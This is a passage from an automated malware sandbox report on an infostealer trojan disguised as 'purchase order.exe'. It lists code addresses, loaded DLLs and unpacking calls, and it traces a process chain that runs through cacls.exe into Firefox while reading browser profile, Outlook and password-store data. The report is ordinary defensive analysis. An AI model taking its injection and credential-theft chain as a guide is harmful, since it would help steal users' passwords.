                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B5DC16_2_037B5DC1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360A3527_2_0360A352
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036103E67_2_036103E6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0355E3F07_2_0355E3F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035F02747_2_035F0274
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035D02C07_2_035D02C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035D81587_2_035D8158
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035EA1187_2_035EA118
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035401007_2_03540100
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036081CC7_2_036081CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036041A27_2_036041A2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036101AA7_2_036101AA
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035E20007_2_035E2000
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035747507_2_03574750
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035507707_2_03550770
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0354C7C07_2_0354C7C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0356C6E07_2_0356C6E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035505357_2_03550535
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036105917_2_03610591
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036024467_2_03602446
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035F44207_2_035F4420
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035FE4F67_2_035FE4F6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360AB407_2_0360AB40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03606BD77_2_03606BD7
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0354EA807_2_0354EA80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035669627_2_03566962
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0361A9A67_2_0361A9A6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035529A07_2_035529A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035528407_2_03552840
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0355A8407_2_0355A840
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035FC87C7_2_035FC87C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0357E8F07_2_0357E8F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035368B87_2_035368B8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035C4F407_2_035C4F40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03570F307_2_03570F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035F2F307_2_035F2F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03592F287_2_03592F28
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03542FC87_2_03542FC8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035CEFA07_2_035CEFA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03550E597_2_03550E59
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360EE267_2_0360EE26
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360EEDB7_2_0360EEDB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03562E907_2_03562E90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360CE937_2_0360CE93
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035ECD1F7_2_035ECD1F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0355AD007_2_0355AD00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0354ADE07_2_0354ADE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03568DBF7_2_03568DBF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03550C007_2_03550C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03540CF27_2_03540CF2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035F0CB57_2_035F0CB5
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0353D34C7_2_0353D34C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360132D7_2_0360132D
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0359739A7_2_0359739A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0356B2C07_2_0356B2C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0356D2F07_2_0356D2F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035F12ED7_2_035F12ED
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035552A07_2_035552A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0361B16B7_2_0361B16B
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0353F1727_2_0353F172
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0358516C7_2_0358516C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0355B1B07_2_0355B1B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360F0E07_2_0360F0E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036070E97_2_036070E9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035FF0CC7_2_035FF0CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035570C07_2_035570C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360F7B07_2_0360F7B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035956307_2_03595630
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036016CC7_2_036016CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036075717_2_03607571
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_036195C37_2_036195C3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035ED5B07_2_035ED5B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035414607_2_03541460
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360F43F7_2_0360F43F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360FB767_2_0360FB76
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0358DBF97_2_0358DBF9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035C5BF07_2_035C5BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0356FB807_2_0356FB80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03607A467_2_03607A46
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360FA497_2_0360FA49
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035C3A6C7_2_035C3A6C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035FDAC67_2_035FDAC6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035EDAAC7_2_035EDAAC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03595AA07_2_03595AA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035F1AA37_2_035F1AA3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035599507_2_03559950
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0356B9507_2_0356B950
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035E59107_2_035E5910
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035BD8007_2_035BD800
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035538E07_2_035538E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360FF097_2_0360FF09
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03513FD27_2_03513FD2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03513FD57_2_03513FD5
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03551F927_2_03551F92
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360FFB17_2_0360FFB1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03559EB07_2_03559EB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03607D737_2_03607D73
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03553D407_2_03553D40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03601D5A7_2_03601D5A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0356FDC07_2_0356FDC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035C9C327_2_035C9C32
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0360FCF27_2_0360FCF2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CE20207_2_02CE2020
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CDCED07_2_02CDCED0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CDB2697_2_02CDB269
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CDB2177_2_02CDB217
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CDB2207_2_02CDB220
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CDB0D07_2_02CDB0D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CDD0F07_2_02CDD0F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CE57007_2_02CE5700
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CE39007_2_02CE3900
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CFBEC07_2_02CFBEC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0341E3AB7_2_0341E3AB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_034252C47_2_034252C4
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0341E2887_2_0341E288
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0341E7437_2_0341E743
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_034254557_2_03425455
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0341CAC37_2_0341CAC3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0341D8087_2_0341D808
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 035CF290 appears 103 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03585130 appears 58 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03597E54 appears 107 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0353B970 appears 262 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 035BEA12 appears 86 times
                Source: C:\Users\user\Desktop\purchase order.exeCode function: String function: 015B7E54 appears 99 times
                Source: C:\Users\user\Desktop\purchase order.exeCode function: String function: 015EF290 appears 103 times
                Source: C:\Users\user\Desktop\purchase order.exeCode function: String function: 015A5130 appears 58 times
                Source: C:\Users\user\Desktop\purchase order.exeCode function: String function: 015DEA12 appears 86 times
                Source: C:\Users\user\Desktop\purchase order.exeCode function: String function: 0155B970 appears 262 times
                Source: purchase order.exe, 00000000.00000002.1854951417.0000000006E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs purchase order.exe
                Source: purchase order.exe, 00000000.00000000.1656386604.0000000000176000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepZNub.exe" vs purchase order.exe
                Source: purchase order.exe, 00000000.00000002.1845243448.0000000004CE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs purchase order.exe
                Source: purchase order.exe, 00000000.00000002.1840433341.0000000003549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs purchase order.exe
                Source: purchase order.exe, 00000000.00000002.1838648327.00000000007CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs purchase order.exe
                Source: purchase order.exe, 00000000.00000002.1839373144.000000000257B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs purchase order.exe
                Source: purchase order.exe, 00000003.00000002.2358800767.00000000010DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs purchase order.exe
                Source: purchase order.exe, 00000003.00000002.2358964709.000000000165D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs purchase order.exe
                Source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs purchase order.exe
                Source: purchase order.exeBinary or memory string: OriginalFilenamepZNub.exe" vs purchase order.exe
                Source: purchase order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: purchase order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, dc4syRqTeG0pjdnuA8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, dc4syRqTeG0pjdnuA8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@7/7
                Source: C:\Users\user\Desktop\purchase order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order.exe.logJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user\AppData\Local\Temp\t577G2K6Jump to behavior
                Source: purchase order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: purchase order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cacls.exe, 00000007.00000003.2551557614.0000000003118000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3517170394.0000000003118000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2551438769.00000000030F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: purchase order.exeReversingLabs: Detection: 34%
                Source: purchase order.exeVirustotal: Detection: 40%
                Source: unknownProcess created: C:\Users\user\Desktop\purchase order.exe "C:\Users\user\Desktop\purchase order.exe"
                Source: C:\Users\user\Desktop\purchase order.exeProcess created: C:\Users\user\Desktop\purchase order.exe "C:\Users\user\Desktop\purchase order.exe"
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\purchase order.exeProcess created: C:\Users\user\Desktop\purchase order.exe "C:\Users\user\Desktop\purchase order.exe"Jump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: purchase order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: purchase order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000002.3517608915.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000002.3517608915.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: olMGHvjsNFhNU.exe, 00000006.00000000.2274072509.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp, olMGHvjsNFhNU.exe, 00000008.00000000.2434347774.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: purchase order.exe, 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2361013060.0000000003365000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2358877344.000000000319E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: purchase order.exe, purchase order.exe, 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000007.00000003.2361013060.0000000003365000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2358877344.000000000319E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.cs.Net Code: DtLHdQbfDH System.Reflection.Assembly.Load(byte[])
                Source: 0.2.purchase order.exe.4ce0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.cs.Net Code: DtLHdQbfDH System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02355E00 push eax; iretd 0_2_02355E09
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004148D4 push cs; iretd 3_2_004148D7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0042E1F3 push edi; ret 3_2_0042E1FC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_00419391 push cs; retf 3_2_00419392
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0040AD51 push ebx; retf 3_2_0040AD54
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_00411D86 push ds; retf 3_2_00411D9F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0040ADAF push ebx; retf 3_2_0040AD54
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004035B0 push eax; ret 3_2_004035B2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_00404E90 push eax; ret 3_2_00404EA9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0153225F pushad ; ret 3_2_015327F9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015327FA pushad ; ret 3_2_015327F9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015609AD push ecx; mov dword ptr [esp], ecx3_2_015609B6
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0153283D push eax; iretd 3_2_01532858
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037BDB72 push FFFFFFECh; iretd 6_2_037BDB8B
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037C0ACF push cs; retf 6_2_037C0AD0
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037D5931 push edi; ret 6_2_037D593A
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037AC5CE push eax; ret 6_2_037AC5E7
